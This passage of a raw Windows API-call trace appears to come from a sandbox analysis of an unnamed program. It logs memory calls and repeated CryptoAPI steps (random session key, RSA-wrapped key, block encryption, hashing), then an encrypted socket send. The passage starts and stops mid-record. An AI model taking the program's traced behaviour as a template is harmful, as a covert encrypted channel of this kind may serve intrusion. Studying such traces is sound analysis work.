(_Block=0x0) [0189.011] free (_Block=0x0) [0189.011] memchr (_Buf=0x3d800db, _Val=32, _MaxCount=0xe) returned 0x0 [0189.011] malloc (_Size=0xf) returned 0x3648e18 [0189.011] free (_Block=0x0) [0189.011] free (_Block=0x0) [0189.011] free (_Block=0x3648ce0) [0189.011] free (_Block=0x3648e18) [0189.011] free (_Block=0x3e221e8) [0189.011] memchr (_Buf=0x3deff40, _Val=32, _MaxCount=0x40) returned 0x0 [0189.011] malloc (_Size=0x41) returned 0x3defd60 [0189.011] free (_Block=0x0) [0189.011] malloc (_Size=0x40) returned 0x3e227d0 [0189.011] free (_Block=0x0) [0189.011] free (_Block=0x0) [0189.011] free (_Block=0x3defd60) [0189.011] free (_Block=0x3e227d0) [0189.011] memchr (_Buf=0x3deffe0, _Val=32, _MaxCount=0x40) returned 0x0 [0189.011] malloc (_Size=0x41) returned 0x3defe50 [0189.011] free (_Block=0x0) [0189.011] malloc (_Size=0x40) returned 0x3e22110 [0189.011] free (_Block=0x0) [0189.011] free (_Block=0x0) [0189.011] free (_Block=0x3defe50) [0189.012] free (_Block=0x3e22110) [0189.012] memchr (_Buf=0x36248e0, _Val=32, _MaxCount=0x2c) returned 0x0 [0189.012] malloc (_Size=0x2d) returned 0x3624950 [0189.012] free (_Block=0x0) [0189.012] malloc (_Size=0x40) returned 0x3e22590 [0189.012] free (_Block=0x0) [0189.013] free (_Block=0x0) [0189.013] free (_Block=0x3624950) [0189.013] free (_Block=0x3e22590) [0189.013] memchr (_Buf=0x3f65300, _Val=32, _MaxCount=0x17) returned 0x3f65308 [0189.013] malloc (_Size=0x9) returned 0x3648ce0 [0189.013] free (_Block=0x0) [0189.013] malloc (_Size=0x40) returned 0x3e22158 [0189.013] free (_Block=0x0) [0189.013] free (_Block=0x0) [0189.013] memchr (_Buf=0x3f65309, _Val=32, _MaxCount=0xe) returned 0x0 [0189.013] malloc (_Size=0xf) returned 0x3648c98 [0189.013] free (_Block=0x0) [0189.013] free (_Block=0x0) [0189.013] free (_Block=0x3648ce0) [0189.013] free (_Block=0x3648c98) [0189.013] free (_Block=0x3e22158) [0189.013] free (_Block=0x3691f90) [0189.013] free (_Block=0x3624b10) [0189.013] free (_Block=0x3f653c0) [0189.013] free (_Block=0x3d800a8) [0189.013] free (_Block=0x3defc20) [0189.013] free (_Block=0x3df0030) [0189.013] free (_Block=0x3e221a0) [0189.013] free (_Block=0x3d80148) [0189.013] free (_Block=0x3e22470) [0189.013] free (_Block=0x60ddc8) [0189.013] free (_Block=0x3d9f428) [0189.013] free (_Block=0x3d80300) [0189.013] free (_Block=0x3e220c8) [0189.014] free (_Block=0x3648d40) [0189.014] free (_Block=0x60ddf8) [0189.014] free (_Block=0x60af20) [0189.014] free (_Block=0x3f65280) [0189.014] free (_Block=0x3648c80) [0189.014] free (_Block=0x3d80288) [0189.014] free (_Block=0x3defb30) [0189.014] free (_Block=0x3defb80) [0189.014] free (_Block=0x3e22308) [0189.014] free (_Block=0x3d80350) [0189.014] free (_Block=0x3648d28) [0189.014] free (_Block=0x3d80080) [0189.014] free (_Block=0x3def9a0) [0189.014] free (_Block=0x3defc70) [0189.014] free (_Block=0x3e22740) [0189.014] free (_Block=0x3d802b0) [0189.014] free (_Block=0x3f653e0) [0189.014] free (_Block=0x3d803c8) [0189.014] free (_Block=0x3def950) [0189.014] free (_Block=0x3defa90) [0189.014] free (_Block=0x3624a68) [0189.014] free (_Block=0x3f652c0) [0189.014] free (_Block=0x3d801e8) [0189.014] free (_Block=0x3d80120) [0189.014] free (_Block=0x3defef0) [0189.014] free (_Block=0x3df0080) [0189.014] free (_Block=0x3648e60) [0189.014] free (_Block=0x3d80238) [0189.014] free (_Block=0x3def010) [0189.014] free (_Block=0x3f654c0) [0189.014] free (_Block=0x3624ad8) [0189.015] free (_Block=0x3e22350) [0189.015] free (_Block=0x3648ec0) [0189.015] free (_Block=0x3f65340) [0189.015] free (_Block=0x60b740) [0189.015] free (_Block=0x3f654e0) [0189.015] free (_Block=0x3d800d0) [0189.015] free (_Block=0x3deff40) [0189.015] free (_Block=0x3deffe0) [0189.015] free (_Block=0x36248e0) [0189.015] free (_Block=0x3f65300) [0189.015] free (_Block=0x60e6c0) [0189.015] free (_Block=0x36929c0) [0189.015] malloc (_Size=0x10) returned 0x3648de8 [0189.015] free (_Block=0x0) [0189.015] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648de8 | out: pbBuffer=0x3648de8) returned 1 [0189.015] malloc (_Size=0x40) returned 0x3e22278 [0189.015] free (_Block=0x0) [0189.015] malloc (_Size=0x104) returned 0x606108 [0189.015] free (_Block=0x3e22278) [0189.015] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x3d9ee38, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x316f384, pcbStructInfo=0x316f35c | out: pvStructInfo=0x316f384, pcbStructInfo=0x316f35c) returned 1 [0189.015] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f384, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x316f380 | out: phKey=0x316f380*=0x4329b8) returned 1 [0189.015] malloc (_Size=0x80) returned 0x609b60 [0189.015] free (_Block=0x0) [0189.015] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x609b60*, pdwDataLen=0x316f350*=0x56, dwBufLen=0x80 | out: pbData=0x609b60*, pdwDataLen=0x316f350*=0x80) returned 1 [0189.016] CryptDestroyKey (hKey=0x4329b8) returned 1 [0189.016] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f420, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x316f41c | out: phKey=0x316f41c*=0x432c78) returned 1 [0189.016] CryptSetKeyParam (hKey=0x432c78, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0189.016] malloc (_Size=0x3a) returned 0x3e22080 [0189.016] free (_Block=0x0) [0189.016] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f330*, pdwDataLen=0x316f294*=0x10, dwBufLen=0x10 | out: pbData=0x316f330*, pdwDataLen=0x316f294*=0x10) returned 1 [0189.016] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f330*, pdwDataLen=0x316f294*=0x10, dwBufLen=0x10 | out: pbData=0x316f330*, pdwDataLen=0x316f294*=0x10) returned 1 [0189.016] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f330*, pdwDataLen=0x316f294*=0x10, dwBufLen=0x10 | out: pbData=0x316f330*, pdwDataLen=0x316f294*=0x10) returned 1 [0189.016] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f330*, pdwDataLen=0x316f294*=0x10, dwBufLen=0x10 | out: pbData=0x316f330*, pdwDataLen=0x316f294*=0x10) returned 1 [0189.016] CryptDestroyKey (hKey=0x432c78) returned 1 [0189.016] malloc (_Size=0x100) returned 0x606218 [0189.016] free (_Block=0x0) [0189.016] free (_Block=0x0) [0189.016] free (_Block=0x3e22080) [0189.016] free (_Block=0x609b60) [0189.016] free (_Block=0x606108) [0189.016] free (_Block=0x3648de8) [0189.016] malloc (_Size=0xd4) returned 0x606108 [0189.016] free (_Block=0x0) [0189.016] malloc (_Size=0xd4) returned 0x3d81e60 [0189.017] free (_Block=0x0) [0189.017] free (_Block=0x0) [0189.017] malloc (_Size=0x1fd) returned 0x3f68818 [0189.017] free (_Block=0x0) [0189.017] CryptHashData (hHash=0x432778, pbData=0x3f68818, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0189.017] CryptDuplicateHash (in: hHash=0x432778, pdwReserved=0x0, dwFlags=0x0, phHash=0x316f47c | out: phHash=0x316f47c) returned 1 [0189.017] malloc (_Size=0x14) returned 0x3f654c0 [0189.017] free (_Block=0x0) [0189.017] CryptGetHashParam (in: hHash=0x432d78, dwParam=0x2, pbData=0x3f654c0, pdwDataLen=0x316f414, dwFlags=0x0 | out: pbData=0x3f654c0, pdwDataLen=0x316f414) returned 1 [0189.017] CryptDestroyHash (hHash=0x432d78) returned 1 [0189.017] free (_Block=0x3f654c0) [0189.017] malloc (_Size=0x1fd) returned 0x3f68a20 [0189.017] free (_Block=0x0) [0189.017] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.017] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.017] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.017] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.017] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.018] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] CryptEncrypt (in: hKey=0x432b78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f3cc*=0x10) returned 1 [0189.019] malloc (_Size=0x1fd) returned 0x60e6c0 [0189.019] free (_Block=0x0) [0189.019] free (_Block=0x0) [0189.019] free (_Block=0x3f68a20) [0189.019] free (_Block=0x3f68818) [0189.019] malloc (_Size=0x202) returned 0x3f68818 [0189.019] free (_Block=0x0) [0189.019] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f404, MessageSeqNo=0x0 | out: pMessage=0x316f404) returned 0x0 [0189.019] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0189.020] free (_Block=0x3f68818) [0189.020] free (_Block=0x3d81e60) [0189.020] free (_Block=0x60e6c0) [0189.020] free (_Block=0x606108) [0189.020] free (_Block=0x606218) [0189.020] GetTickCount () returned 0x116fe3d [0189.020] malloc (_Size=0x10) returned 0x3648e90 [0189.020] free (_Block=0x0) [0189.020] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e90*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0189.020] free (_Block=0x3648e90) [0189.020] GetTickCount () returned 0x116fe3d [0189.021] malloc (_Size=0x10) returned 0x3648d88 [0189.021] free (_Block=0x0) [0189.021] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648d88*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0189.335] free (_Block=0x3648d88) [0189.335] GetTickCount () returned 0x116ff76 [0189.336] SetEvent (hEvent=0x380) returned 1 [0189.336] SetEvent (hEvent=0x3a4) returned 1 [0189.336] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x316f4ac | out: phHash=0x316f4ac) returned 1 [0189.336] CryptHashData (hHash=0x432df8, pbData=0x3d9f130, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0189.336] malloc (_Size=0x14) returned 0x3f654c0 [0189.336] free (_Block=0x0) [0189.336] CryptGetHashParam (in: hHash=0x432df8, dwParam=0x2, pbData=0x3f654c0, pdwDataLen=0x316f4a4, dwFlags=0x0 | out: pbData=0x3f654c0, pdwDataLen=0x316f4a4) returned 1 [0189.336] CryptDestroyHash (hHash=0x432df8) returned 1 [0189.336] malloc (_Size=0x13d) returned 0x3dd4a20 [0189.336] free (_Block=0x0) [0189.336] malloc (_Size=0x34) returned 0x3624670 [0189.336] malloc (_Size=0x338) returned 0x3f68818 [0189.336] malloc (_Size=0x80) returned 0x60a578 [0189.336] free (_Block=0x0) [0189.336] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x60a578 | out: pbBuffer=0x60a578) returned 1 [0189.336] CryptImportKey (in: hProv=0x3e57b0, pbData=0x316f140, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x316f13c | out: phKey=0x316f13c*=0x432938) returned 1 [0189.339] CryptExportKey (in: hKey=0x432938, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x316ed9c, pdwDataLen=0x316ed84 | out: pbData=0x316ed9c*, pdwDataLen=0x316ed84*=0x90) returned 1 [0189.339] free (_Block=0x60a578) [0189.339] malloc (_Size=0x10) returned 0x3648cc8 [0189.339] free (_Block=0x0) [0189.340] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648cc8 | out: pbBuffer=0x3648cc8) returned 1 [0189.340] malloc (_Size=0x40) returned 0x3e223e0 [0189.340] free (_Block=0x0) [0189.340] malloc (_Size=0x104) returned 0x3f68b58 [0189.340] free (_Block=0x3e223e0) [0189.340] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x3d9f130, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x316f374, pcbStructInfo=0x316f34c | out: pvStructInfo=0x316f374, pcbStructInfo=0x316f34c) returned 1 [0189.340] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f374, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x316f370 | out: phKey=0x316f370*=0x432c78) returned 1 [0189.340] malloc (_Size=0x80) returned 0x60a248 [0189.340] free (_Block=0x0) [0189.340] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x60a248*, pdwDataLen=0x316f340*=0x56, dwBufLen=0x80 | out: pbData=0x60a248*, pdwDataLen=0x316f340*=0x80) returned 1 [0189.340] CryptDestroyKey (hKey=0x432c78) returned 1 [0189.340] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f410, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x316f40c | out: phKey=0x316f40c*=0x432c78) returned 1 [0189.340] CryptSetKeyParam (hKey=0x432c78, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0189.340] malloc (_Size=0xf7) returned 0x3d81f20 [0189.340] free (_Block=0x0) [0189.340] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.340] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.340] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0189.341] CryptDestroyKey (hKey=0x432c78) returned 1 [0189.341] malloc (_Size=0x100) returned 0x606108 [0189.341] free (_Block=0x0) [0189.341] malloc (_Size=0x404) returned 0x60e6c0 [0189.341] free (_Block=0x606108) [0189.341] free (_Block=0x0) [0189.341] free (_Block=0x3d81f20) [0189.341] free (_Block=0x60a248) [0189.341] free (_Block=0x3f68b58) [0189.341] free (_Block=0x3648cc8) [0189.341] malloc (_Size=0x40) returned 0x3e227d0 [0189.341] free (_Block=0x0) [0189.342] malloc (_Size=0x410) returned 0x3def010 [0189.342] free (_Block=0x3e227d0) [0189.342] malloc (_Size=0x18b) returned 0x3f699c0 [0189.342] free (_Block=0x0) [0189.342] free (_Block=0x0) [0189.342] malloc (_Size=0x1fd) returned 0x606108 [0189.342] free (_Block=0x0) [0189.342] CryptHashData (hHash=0x432978, pbData=0x606108, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0189.342] CryptDuplicateHash (in: hHash=0x432978, pdwReserved=0x0, dwFlags=0x0, phHash=0x316f43c | out: phHash=0x316f43c) returned 1 [0189.342] malloc (_Size=0x14) returned 0x3f65280 [0189.342] free (_Block=0x0) [0189.342] CryptGetHashParam (in: hHash=0x4327b8, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x316f3d4, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x316f3d4) returned 1 [0189.342] CryptDestroyHash (hHash=0x4327b8) returned 1 [0189.342] free (_Block=0x3f65280) [0189.342] malloc (_Size=0x1fd) returned 0x60ead0 [0189.342] free (_Block=0x0) [0189.342] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.342] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.342] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.342] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.342] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.342] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.342] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.342] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x316f38c*=0x10) returned 1 [0189.343] CryptEncrypt (in: hKey=0x432a38, 